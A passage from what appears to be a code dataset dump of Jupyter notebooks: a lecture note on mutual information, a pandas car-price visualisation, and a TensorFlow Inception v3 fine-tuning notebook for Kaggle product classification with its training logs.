"Mutual information is a fundamental quantity in information theory. It is widely used in machine learning to measure statistical dependency among different features in data. Applications are numerous, ranging from classification, clustering, representation learning, and other tasks that require the selection/extraction of lower-dimensional features of the data without losing valuable information. Although mutual information has a precise formula defined in terms of a probability model, it must be estimated for real-world data with an unknown probability model.",
"_____no_output_____"
],
[
"In this lecture series, we will dive into some of the applications and estimations of mutual information in machine learning. Registered participants will have hands-on coding experience using the virtual teaching and learning environment DIVE offered by CityU CS Department.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
]
] |
e7064e180823e086fb5d0b6b3750a489a1b0228e | 202,884 | ipynb | Jupyter Notebook | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | day2_visualisation.ipynb | Grajes-pl/dw_matrix_car | db627fbc4b2f15f23c65fdb39ecb9e5025533bb3 | [
"MIT"
] | null | null | null | 202,884 | 202,884 | 0.935347 | [
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n",
"_____no_output_____"
],
[
"!pip install --upgrade tables",
"Collecting tables\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/c3/8fd9e3bb21872f9d69eb93b3014c86479864cca94e625fd03713ccacec80/tables-3.6.1-cp36-cp36m-manylinux1_x86_64.whl (4.3MB)\n\u001b[K |████████████████████████████████| 4.3MB 2.9MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numexpr>=2.6.2 in /usr/local/lib/python3.6/dist-packages (from tables) (2.7.1)\nRequirement already satisfied, skipping upgrade: numpy>=1.9.3 in /usr/local/lib/python3.6/dist-packages (from tables) (1.17.5)\nInstalling collected packages: tables\n Found existing installation: tables 3.4.4\n Uninstalling tables-3.4.4:\n Successfully uninstalled tables-3.4.4\nSuccessfully installed tables-3.6.1\n"
],
[
"cd \"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_2/dw_matrix_car\"",
"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_2/dw_matrix_car\n"
],
[
"df = pd.read_hdf('data/car.h5')",
"_____no_output_____"
],
[
"df.columns.values",
"_____no_output_____"
],
[
"df['price_value'].hist(bins=100);",
"_____no_output_____"
],
[
"df['price_value'].describe()",
"_____no_output_____"
],
[
"df['param_marka-pojazdu'].unique()",
"_____no_output_____"
],
[
"(\n df\n .groupby('param_marka-pojazdu')['price_value']\n .agg(np.median)\n .sort_values(ascending=False)\n .head(50)\n).plot(kind='bar', figsize=(15,5))",
"_____no_output_____"
],
[
"(\n df\n .groupby('param_marka-pojazdu')['price_value']\n .agg([np.mean, np.median, np.size])\n .sort_values(by='size', ascending=False)\n .head(50)\n).plot(kind='bar', figsize=(15,5), subplots=True)",
"_____no_output_____"
],
[
"def group_and_barplot(feat_groupby, feat_agg='price_value', agg_funcs=[np.mean, np.median, np.size], feat_sort='mean', top=50, subplots=True ):\n return (\n df\n .groupby(feat_groupby)[feat_agg]\n .agg(agg_funcs)\n .sort_values(by=feat_sort, ascending=False)\n .head(top)\n ).plot(kind='bar', figsize=(15,5), subplots=subplots)",
"_____no_output_____"
],
[
"group_and_barplot('param_marka-pojazdu');",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia', feat_sort='size');",
"_____no_output_____"
],
[
"group_and_barplot('param_kolor', feat_sort='mean');",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70651a7e05394eee523efdcfc43480a11676916 | 437,603 | ipynb | Jupyter Notebook | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2018-06-27T14:14:01.000Z | 2018-06-27T14:14:01.000Z | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2017-12-30T01:01:52.000Z | 2018-01-05T04:09:32.000Z | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2018-06-27T14:14:16.000Z | 2018-06-27T14:14:16.000Z | 67.251114 | 221 | 0.671867 | [
[
[
"# Running %env without any arguments\n# lists all environment variables\n\n# The line below sets the environment\n# variable CUDA_VISIBLE_DEVICES\n%env CUDA_VISIBLE_DEVICES = 0\n\nimport numpy as np\nimport pandas as pd\nimport io\nimport time\nimport bson # this is installed with the pymongo package\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread, imsave\nimport tensorflow as tf\nfrom tensorflow.python.platform import tf_logging\nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib.training import add_gradients_summaries\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.training import optimizer as tf_optimizer\nfrom tensorflow.python.ops import variables as tf_variables\nimport os.path\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim.python.slim.nets import inception\nimport inception_preprocessing\nimport logging\n\n# This is a bit of magic to make matplotlib figures appear inline in the notebook\n# rather than in a new window.\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\n# Some more magic so that the notebook will reload external python modules;\n# see http://stackoverflow.com/questions/1907993/autoreload-of-modules-in-ipython\n%load_ext autoreload\n%autoreload 2",
"env: CUDA_VISIBLE_DEVICES=0\n"
],
[
"DATASET_PATH = '/media/rs/0E06CD1706CD0127/Kapok/kaggle/'\nPRETRAINED_MODEL_PATH = DATASET_PATH + 'inception-v3/20160828/inception_v3.ckpt'\n#PRETRAINED_MODEL_PATH = DATASET_PATH + 'logs/before/inception_v3_model.ckpt-810491'\nLOG_PATH = DATASET_PATH + 'logs/'\nTRAIN_PATH = DATASET_PATH + 'Split1/Train/'\nVAL_PATH = DATASET_PATH + 'Split1/Validation/'\nTEST_PATH = DATASET_PATH + 'Test/'\nCATEGORY_NAME_PATH = DATASET_PATH + 'category_names.csv'\nBATCH_SIZE = 128#256\n\n# total_batch_size is BATCH_SIZE * ACCUMULATE_STEP\nACCUMULATE_STEP = 4\n\nIMAGE_WIDTH = 180\nIMAGE_HEIGHT = 180\nNUM_CLASS = 5270\n# validation examples num: 2319624\n# train examples num: 10051704\n# total step: 157057\nTOTAL_EXAMPLES = 10051704\n# validation num = 2319624\nVAL_CHECK_FREQ = 50\nNUM_EPOCHES = 7\nINPUT_THREADS = 6\nEPOCHES_OVER = 7\n#Learning rate information and configuration (Up to you to experiment)\n# initial_learning_rate = 0.000003#0.00001\n# learning_rate_decay_factor = 0.94\ninitial_learning_rate = 0.001#0.00001\nlearning_rate_decay_factor = 0.6\nnum_epochs_before_decay = 1\n#Know the number steps to take before decaying the learning rate and batches per epoch\nmoving_average_decay = 0.9\nmomentum = 0.8\nnum_steps_per_epoch = TOTAL_EXAMPLES / (BATCH_SIZE * ACCUMULATE_STEP) + 1\ndecay_steps = int(num_epochs_before_decay * num_steps_per_epoch / 6)",
"_____no_output_____"
],
[
"# get TF logger\nlog = logging.getLogger('tensorflow')\nlog.setLevel(logging.DEBUG)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler(DATASET_PATH + 'tensorflow_inception_160_train.log')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(formatter)\nlog.addHandler(fh)",
"_____no_output_____"
],
[
"class MiniDataSet(object):\n def __init__(self, file_path_pattern, category_level_csv, num_examples, num_classes, is_training = True, min_after_dequeue=2000, batch_size = BATCH_SIZE, num_epochs = NUM_EPOCHES, num_reader = INPUT_THREADS):\n super(MiniDataSet, self).__init__()\n self._num_examples = num_examples\n self._num_classes = num_classes\n self._file_path_pattern = file_path_pattern\n self._category_level_csv = category_level_csv\n self._num_reader = num_reader\n self._batch_size = batch_size\n self._num_epochs = num_epochs\n self._min_after_dequeue = min_after_dequeue\n self._is_training = is_training\n \n def get_category_description_from_csv(self, level = 0):\n category_map = dict()\n csv = pd.read_csv(self._category_level_csv).values\n for row in csv: \n category_id, levels = row[0], row[1:]\n category_map[category_id] = levels[level]\n return category_map\n\n def create_dataset(self):\n opts = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.ZLIB)\n reader = lambda : tf.TFRecordReader(options=opts)\n keys_to_features = {\n 'img_raw': tf.FixedLenFeature([], tf.string, default_value=''),\n 'product_id': tf.FixedLenFeature([], tf.int64, default_value=tf.zeros([], dtype=tf.int64)),\n # notice that we don't have this feature in our TFRecord, so always default provided\n 'format': tf.FixedLenFeature([], tf.string, default_value='jpg'),\n 'category_id': tf.FixedLenFeature([], tf.int64, default_value=tf.zeros([], dtype=tf.int64))\n }\n\n items_to_handlers = {\n # automated decode image from features in FixedLenFeature\n 'image': slim.tfexample_decoder.Image(image_key='img_raw', format_key='format'),\n 'label': slim.tfexample_decoder.Tensor('category_id'),\n }\n\n decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers)\n\n labels_to_name_dict = self.get_category_description_from_csv()\n\n self._dataset = slim.dataset.Dataset(\n data_sources = self._file_path_pattern,\n decoder = decoder,\n reader = reader,\n # num_readers = 8,\n num_samples = self._num_examples,\n #num_classes = self._num_classes,\n #labels_to_name = labels_to_name_dict,\n items_to_descriptions = None)\n \n # notice that DatasetDataProvider can automate shuffle the examples by ParallelReader using its RandomShuffleQueue\n self._data_provider = slim.dataset_data_provider.DatasetDataProvider(\n self._dataset,\n num_readers = self._num_reader,\n shuffle = True, # default is True\n num_epochs = self._num_epochs,\n common_queue_capacity = self._min_after_dequeue + 3 * self._batch_size,\n common_queue_min = self._min_after_dequeue,\n scope = self._is_training and 'train_files' or 'validation_files')\n \n return self._data_provider.get(['image', 'label'])\n ",
"_____no_output_____"
],
[
"def preprocess_for_inception(input_image, is_training = True):\n # inception_v3.default_image_size = 299\n return inception_preprocessing.preprocess_image(input_image, 160, 160, True)#is_training)",
"_____no_output_____"
],
[
"def cvt_csv2tfrecord():\n count = 0\n category_map = dict()\n csv = pd.read_csv(CATEGORY_NAME_PATH).values\n for row in csv: \n category_id, _ = row[0], row[1:]\n category_map[category_id] = count\n count += 1\n return category_map",
"_____no_output_____"
],
[
"def one_hot_process(org_label, map_table, num_classes):\n return tf.one_hot(map_table.lookup(tf.as_string(org_label)), num_classes, axis=-1)",
"_____no_output_____"
],
[
"def my_create_train_op(total_loss, optimizer, summarize_gradients = False, accumulate_factor=None):\n global_step = tf.train.get_or_create_global_step()\n\n update_ops = set(ops.get_collection(ops.GraphKeys.UPDATE_OPS))\n\n # Make sure update_ops are computed before total_loss.\n if update_ops:\n with ops.control_dependencies(update_ops):\n barrier = control_flow_ops.no_op(name='update_barrier')\n total_loss = control_flow_ops.with_dependencies([barrier], total_loss)\n\n variables_to_train = tf_variables.trainable_variables()\n\n # initialized with 0s\n accum_vars = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False) for tv in variables_to_train]\n zero_ops = [tv.assign(tf.zeros_like(tv)) for tv in accum_vars]\n\n # Calls the compute_gradients function of the optimizer to obtain... the list of gradients\n grads = optimizer.compute_gradients(\n total_loss,\n variables_to_train,\n gate_gradients=tf_optimizer.Optimizer.GATE_OP,\n aggregation_method=None,\n colocate_gradients_with_ops=False)\n\n ## Adds to each element from the list you initialized earlier with zeros its gradient (works because accum_vars and grads are in the same order)\n if accumulate_factor is not None: \n total_loss = array_ops.check_numerics(total_loss, 'LossTensor is inf or nan')\n with tf.control_dependencies([total_loss]):\n accum_ops = [accum_vars[i].assign_add(gv[0]) for i, gv in enumerate(grads) if gv[0] is not None]\n\n ## Define the training step (part with variable value update)\n accumulate_grads = [(tf.multiply(accum_vars[i], accumulate_factor), gv[1]) for i, gv in enumerate(grads) if gv[0] is not None]\n #accumulate_grads = [(accum_vars[i], gv[1]) for i, gv in enumerate(grads) if gv[0] is not None]\n else:\n accum_ops = tf.ops.no_op\n \n if accumulate_factor is not None: \n # Summarize gradients.\n if summarize_gradients:\n with ops.name_scope('summarize_grads'):\n add_gradients_summaries(accumulate_grads)\n grad_updates = optimizer.apply_gradients(accumulate_grads, global_step=global_step)\n else:\n # Summarize gradients.\n if summarize_gradients:\n with ops.name_scope('summarize_grads'):\n add_gradients_summaries(grads)\n grad_updates = optimizer.apply_gradients(grads, global_step=global_step)\n\n with ops.name_scope('train_op'):\n # Ensure the train_tensor computes grad_updates.\n train_op = control_flow_ops.with_dependencies([grad_updates], total_loss)\n\n # Add the operation used for training to the 'train_op' collection\n train_ops = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)\n if train_op not in train_ops:\n train_ops.append(train_op)\n\n return train_op, accum_ops, zero_ops",
"_____no_output_____"
],
[
"def_graph = tf.Graph()\nwith def_graph.as_default() as graph:\n def train_step(input_examples, one_hot_labels): \n with slim.arg_scope(inception.inception_v3_arg_scope()):\n # here logits is the pre-softmax activations\n logits, end_points = inception.inception_v3(\n input_examples,\n num_classes = NUM_CLASS,\n is_training = True)\n\n # Create the global step for monitoring the learning_rate and training.\n # since supervisor will also create one global_step, so we create n advance in order to feed into exponential_decay\n global_step = tf.train.get_or_create_global_step(graph = graph)\n \n #variables_to_restore = slim.get_variables_to_restore()\n variables_to_restore = slim.get_variables_to_restore(exclude = ['InceptionV3/Logits', 'InceptionV3/AuxLogits'])\n #variables_to_restore_from_checkpoint = slim.get_variables_to_restore(exclude = variables_to_exclude)\n # Performs the equivalent to tf.nn.sparse_softmax_cross_entropy_with_logits but enhanced, e.x. label smothing\n loss = tf.losses.softmax_cross_entropy(onehot_labels = one_hot_labels, logits = logits)\n aux_loss = tf.losses.softmax_cross_entropy(onehot_labels = one_hot_labels, logits = end_points['AuxLogits'], weights=0.2)\n total_loss = tf.losses.get_total_loss() # obtain the regularization losses as well\n\n \n\n #Define your exponentially decaying learning rate\n lr = tf.train.exponential_decay(\n learning_rate = initial_learning_rate,\n global_step = global_step,\n decay_steps = decay_steps,\n decay_rate = learning_rate_decay_factor,\n staircase = True)\n\n #Now we can define the optimizer that takes on the learning rate\n optimizer = tf.train.AdamOptimizer(learning_rate = lr)\n #optimizer = tf.train.MomentumOptimizer(learning_rate = lr, momentum=momentum)\n \n moving_average_variables = slim.get_model_variables()\n variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)\n # Use an alternative set of update ops in addition to the default updates:\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variable_averages.apply(moving_average_variables))\n\n #Create the train_op.\n accumulate_factor = tf.constant([1./ACCUMULATE_STEP], name='accumulate_factor')\n train_op, accum_ops, zero_ops = my_create_train_op(total_loss, optimizer, False, accumulate_factor)\n #Create the train_op.\n #train_op = slim.learning.create_train_op(total_loss, optimizer, summarize_gradients=False)\n\n #State the metrics that you want to predict. We get a predictions that is not one_hot_encoded.\n predictions = tf.argmax(end_points['Predictions'], 1)\n probabilities = end_points['Predictions']\n accuracy, accuracy_update = tf.contrib.metrics.streaming_accuracy(predictions, tf.argmax(one_hot_labels, 1))\n metrics_op = tf.group(accuracy_update)\n\n\n #Now finally create all the summaries you need to monitor and group them into one summary op.\n tf.summary.scalar('losses/Total_Loss', total_loss)\n tf.summary.scalar('accuracy', accuracy)\n tf.summary.scalar('learning_rate', lr)\n\n return train_op, accum_ops, zero_ops, global_step, metrics_op, variables_to_restore, predictions, lr, accuracy, total_loss\n\n def validation_step(input_examples, one_hot_labels): \n with slim.arg_scope(inception.inception_v3_arg_scope()):\n # here logits is the pre-softmax activations\n logits, end_points = inception.inception_v3(\n input_examples,\n num_classes = NUM_CLASS,\n is_training=False, reuse=True)\n\n #State the metrics that you want to predict. We get a predictions that is not one_hot_encoded.\n predictions = tf.argmax(end_points['Predictions'], 1)\n probabilities = end_points['Predictions']\n accuracy, accuracy_update = tf.contrib.metrics.streaming_accuracy(predictions, tf.argmax(one_hot_labels, 1))\n metrics_op = tf.group(accuracy_update)\n\n #Now finally create all the summaries you need to monitor and group them into one summary op.\n tf.summary.scalar('validation/accuracy', accuracy)\n\n return metrics_op, accuracy, predictions, probabilities",
"_____no_output_____"
],
[
"with def_graph.as_default() as graph:\n def init_dataset(file_path_pattern, mapping_table, is_training = True):\n dataset = MiniDataSet(file_path_pattern, CATEGORY_NAME_PATH, TOTAL_EXAMPLES, NUM_CLASS, is_training = is_training)\n org_image, org_label = dataset.create_dataset()\n image = preprocess_for_inception(org_image, is_training) # final image to train\n\n label = one_hot_process(org_label, mapping_table, NUM_CLASS) # final label for training\n # no need for shuffle, DatasetDataProvider do this for us\n batch_images, batch_labels = tf.train.batch([image, label], BATCH_SIZE,\\\n num_threads = INPUT_THREADS,\\\n capacity = 2000 + 3 * BATCH_SIZE,\\\n allow_smaller_final_batch = is_training, name = is_training and 'train_batch' or 'validation_batch')\n \n return batch_images, batch_labels",
"_____no_output_____"
],
[
"with def_graph.as_default() as graph:\n mapping_strings = tf.constant( [ str(key) for key in cvt_csv2tfrecord().keys() ] )\n mapping_table = tf.contrib.lookup.index_table_from_tensor(mapping=mapping_strings, default_value=0)\n batch_images, batch_labels = init_dataset(TRAIN_PATH + \"output_file*.tfrecords\", mapping_table)\n batch_val_images, batch_val_labels = init_dataset(VAL_PATH + \"test_output_file*.tfrecords\", mapping_table, False)\n with tf.device('/gpu:0'):\n train_op, accum_op, zero_op, global_step, metrics_op, variables_to_restore, pred_op, lr, accuracy, total_loss = train_step(batch_images, batch_labels)\n val_metrics_op, val_accuracy, val_predictions, val_probabilities = validation_step(batch_val_images, batch_val_labels)\n real_val_label = tf.argmax(batch_val_labels, 1)\n \n global_step_zero = global_step.assign(tf.zeros_like(global_step))\n \n summary_op = tf.summary.merge_all()\n # Create a saver that restores only the pre-trained variables.\n # we have change optim, restore all param use pretrained mode\n #pre_train_saver = tf.train.Saver(variables_to_restore)\n \n variables = slim.get_variables_to_restore()\n restore_from_pretrained = tf.contrib.framework.filter_variables(\n variables,\n include_patterns=None,\n exclude_patterns=['ExponentialMovingAverage', 'accumulate_factor', 'Momentum', 'InceptionV3/Logits', 'InceptionV3/AuxLogits'])\n\n pre_train_saver = tf.train.Saver(variables_to_restore)\n # Define an init function that loads the pretrained checkpoint.\n # sess is the managed session passed by Supervisor\n def load_pretrain(sess):\n pre_train_saver.restore(sess, PRETRAINED_MODEL_PATH)\n\n # no need for specify local_variables_initializer and tables_initializer, Supervisor will do this via default local_init_op\n # init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer(), tf.tables_initializer())\n init_op = tf.group(tf.global_variables_initializer())\n # Pass the init function to the supervisor.\n # - The init function is called _after_ the variables have been initialized by running the init_op.\n # - use default tf.Saver() for ordinary save and restore\n # - save checkpoint every 1.3 hours(4800)\n # - manage summary in current process by ourselves for memory saving\n # - no need to specify global_step, supervisor will find this automately\n # - initialize order: checkpoint -> local_init_op -> init_op -> init_func\n sv = tf.train.Supervisor(logdir=LOG_PATH, init_fn = load_pretrain, init_op = init_op, summary_op = None, save_model_secs=12000, checkpoint_basename='inception_v3_model.ckpt')\n \n final_loss = 0.\n final_accuracy = 0.\n training_state = True\n\n config = tf.ConfigProto(log_device_placement=True, allow_soft_placement=True)\n #config.gpu_options.allow_growth = True\n with sv.managed_session(config=config) as sess:\n #with sv.prepare_or_wait_for_session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True)) as sess:\n\n #sess.run(global_step_zero)\n # Here sess was either initialized from the pre-trained-checkpoint or\n # recovered from a checkpoint saved in a previous run of this code.\n for step in range(int(num_steps_per_epoch * NUM_EPOCHES)): \n if sv.should_stop():\n tf_logging.info('Supervisor emit finished!')\n tf_logging.info('Current Loss: %s', loss)\n tf_logging.info('Current Accuracy: %s', accuracy)\n tf_logging.info('Saving current model to disk(maybe invalid).')\n training_state = False\n break\n\n start_time = time.time()\n\n if step % 1000 == 0:\n summ = sess.run(summary_op)\n sv.summary_computed(sess, summ)\n if step > EPOCHES_OVER * num_steps_per_epoch:\n raise StopIteration(\"over epoches reached.\")\n\n if step % VAL_CHECK_FREQ == 0:\n with tf.device('/gpu:0'):\n _, val_acc, val_pred, val_prob, real_label = sess.run([val_metrics_op, val_accuracy, val_predictions, val_probabilities, real_val_label])\n time_elapsed = time.time() - start_time\n tf_logging.info('Validation Speed: {:5.3f}sec/batch'.format(time_elapsed))\n tf_logging.info('Current Streaming ValAccuracy: {:5.3f}%'.format(val_acc*100.))\n tf_logging.info('Real Label: {}'.format(real_label))\n tf_logging.info('Pred Label: {}'.format(val_pred))\n\n else:\n with tf.device('/gpu:0'):\n # accumulate gradient to get bigger batch_size\n sess.run(zero_op)\n for _ in range(1, ACCUMULATE_STEP):\n sess.run([accum_op, total_loss])\n _, _, _, cur_loss, cur_acc, total_step, cur_lr = sess.run([train_op, accum_op, metrics_op, total_loss, accuracy, global_step, lr])\n# sess.run([train_op])\n time_elapsed = time.time() - start_time\n\n if step % 10 == 0:\n final_loss = cur_loss\n final_accuracy = cur_acc\n tf_logging.info('Current Speed: {:5.3f}sec/batch'.format(time_elapsed))\n tf_logging.info('Current Streaming Accuracy: {:5.3f}%'.format(cur_acc*100.))\n tf_logging.info('Current Loss: {:5.3f}'.format(cur_loss))\n tf_logging.info('Epoch %s/%s, Global Step: %s', int(total_step / num_steps_per_epoch + 1), NUM_EPOCHES, total_step)\n tf_logging.info('Current Learning Rate: {}'.format(cur_lr))\n \n if training_state:\n #We log the final training loss and accuracy\n tf_logging.info('Final Loss: %s', final_loss)\n tf_logging.info('Final Accuracy: %s', final_accuracy)\n # Once all the training has been done, save the log files and checkpoint model\n tf_logging.info('Finished training! Model saved.')\n sv.saver.save(sess, sv.save_path, global_step = sv.global_step)\n ",
"INFO:tensorflow:Restoring parameters from /media/rs/0E06CD1706CD0127/Kapok/kaggle/inception-v3/20160828/inception_v3.ckpt\nINFO:tensorflow:Starting standard services.\nINFO:tensorflow:Saving checkpoint to path /media/rs/0E06CD1706CD0127/Kapok/kaggle/logs/inception_v3_model.ckpt\nINFO:tensorflow:Starting queue runners.\nINFO:tensorflow:global_step/sec: 0\nINFO:tensorflow:Validation Speed: 15.979sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 0.000%\nINFO:tensorflow:Real Label: [3186 236 3778 4045 1453 3776 2821 4160 4023 2884 3623 1974 4835 4350 4159\n 4583 2923 4429 4792 4350 4279 4970 2816 1644 991 3501 1308 4279 1866 1282\n 1301 289 4279 3186 2499 3512 3800 1394 4393 4873 353 2761 396 3412 2736\n 3571 3069 140 2884 3692 4970 3623 4153 5090 4279 457 3379 457 1301 4245\n 2836 457 3623 2921 2938 3877 3807 3671 200 289 219 4045 3643 2831 2159\n 3920 3730 4429 4722 3279 4393 414 3631 672 991 4816 3501 1056 2647 3186\n 4279 289 3330 2159 3465 4814 232 2264 3328 289 1261 3929 289 3768 2849\n 457 2178 3583 3230 3162 991 2908 4970 991 1162 2886 3186 4792 2076 4393\n 1746 1607 4045 4429 2816 3411 4350 656]\nINFO:tensorflow:Pred Label: [1230 2280 3914 2035 5125 808 2855 808 1354 4130 1764 1977 3702 2568 2757\n 1504 738 4496 1549 2122 3487 401 384 4368 3617 1363 2757 3415 3349 4711\n 2931 4687 937 3274 3412 1697 2931 698 881 2990 3337 3134 3609 5237 4114\n 1259 1443 3429 4368 4009 3797 953 4858 4114 4114 2757 2757 206 4368 2757\n 4009 3551 4368 687 1915 1259 2717 2689 3274 3914 4368 1351 4706 4114 4955\n 808 2757 4124 2855 4368 2855 4828 4368 4114 3298 3274 2857 905 4466 4368\n 1259 4051 2301 4114 4403 937 2632 2757 1942 3274 1230 5073 4706 2757 1443\n 208 206 2301 3031 2632 2280 793 4368 4188 206 4368 2280 5257 1158 3274\n 4114 718 125 3234 1791 4114 3785 3914]\nINFO:tensorflow:Current Speed: 2.552sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 2.517%\nINFO:tensorflow:Current Loss: 11.022\nINFO:tensorflow:Epoch 1/7, Global Step: 10\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.446sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 3.207%\nINFO:tensorflow:Current Loss: 9.935\nINFO:tensorflow:Epoch 1/7, Global Step: 20\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.440sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 4.580%\nINFO:tensorflow:Current Loss: 10.109\nINFO:tensorflow:Epoch 1/7, Global Step: 30\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.308332\nINFO:tensorflow:Current Speed: 2.362sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 5.188%\nINFO:tensorflow:Current Loss: 10.048\nINFO:tensorflow:Epoch 1/7, Global Step: 40\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.165sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 0.000%\nINFO:tensorflow:Real Label: [ 275 4153 3929 3807 4153 3539 4366 4248 2890 4045 3773 2923 1099 4045 1796\n 2886 377 229 4973 4045 4523 4814 662 292 3643 3234 2923 3623 289 1403\n 2878 4153 1372 3571 1372 4970 991 4205 3929 4350 4153 2938 4300 5254 4393\n 3692 4970 2649 2936 3138 4255 927 4970 4582 248 3104 4468 4875 2816 991\n 3329 377 4153 4814 2829 3185 4839 4160 3414 4873 2650 3279 5210 4223 1588\n 2923 2230 3623 3692 3891 2884 4802 289 4816 4810 5026 2884 3328 4153 185\n 2878 3185 3414 4393 2938 1551 3059 3328 4160 4792 999 289 3217 1239 289\n 168 991 457 4816 461 2908 1005 2948 688 3279 4160 2887 98 5089 5153\n 1956 4816 4816 3078 3929 4816 3414 1282]\nINFO:tensorflow:Pred Label: [4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160]\nINFO:tensorflow:Current Speed: 2.485sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 6.358%\nINFO:tensorflow:Current Loss: 8.855\nINFO:tensorflow:Epoch 1/7, Global Step: 59\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.541sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 7.261%\nINFO:tensorflow:Current Loss: 9.427\nINFO:tensorflow:Epoch 1/7, Global Step: 69\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.109sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 8.043%\nINFO:tensorflow:Current Loss: 9.123\nINFO:tensorflow:Epoch 1/7, Global Step: 79\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.416667\nINFO:tensorflow:Current Speed: 2.208sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 8.771%\nINFO:tensorflow:Current Loss: 8.476\nINFO:tensorflow:Epoch 1/7, Global Step: 89\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.145sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 1.172%\nINFO:tensorflow:Real Label: [4350 229 4910 289 4330 4393 3336 2283 4045 2770 3795 4816 4350 2017 3692\n 2147 3932 3165 289 1475 3623 3331 4153 1453 4393 2908 4393 4816 3277 2878\n 4393 4663 3328 328 4064 991 4393 4153 1282 4816 3527 1435 3414 4341 4970\n 3623 991 3182 2108 4800 4393 289 1255 2938 1853 2821 662 3341 4335 5214\n 2908 3623 4894 3692 4837 4970 3730 377 4970 2908 289 3188 74 4045 3059\n 4390 1011 4045 3535 2063 4970 4816 2908 377 289 2349 2663 4816 3692 3328\n 4350 229 2718 3582 289 4656 4826 289 1956 4045 101 457 2608 4816 289\n 3262 805 3623 3830 3170 4350 4933 2908 4993 4815 4957 140 4839 1712 1836\n 991 2886 2647 3797 1161 2878 5032 3277]\nINFO:tensorflow:Pred Label: [3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 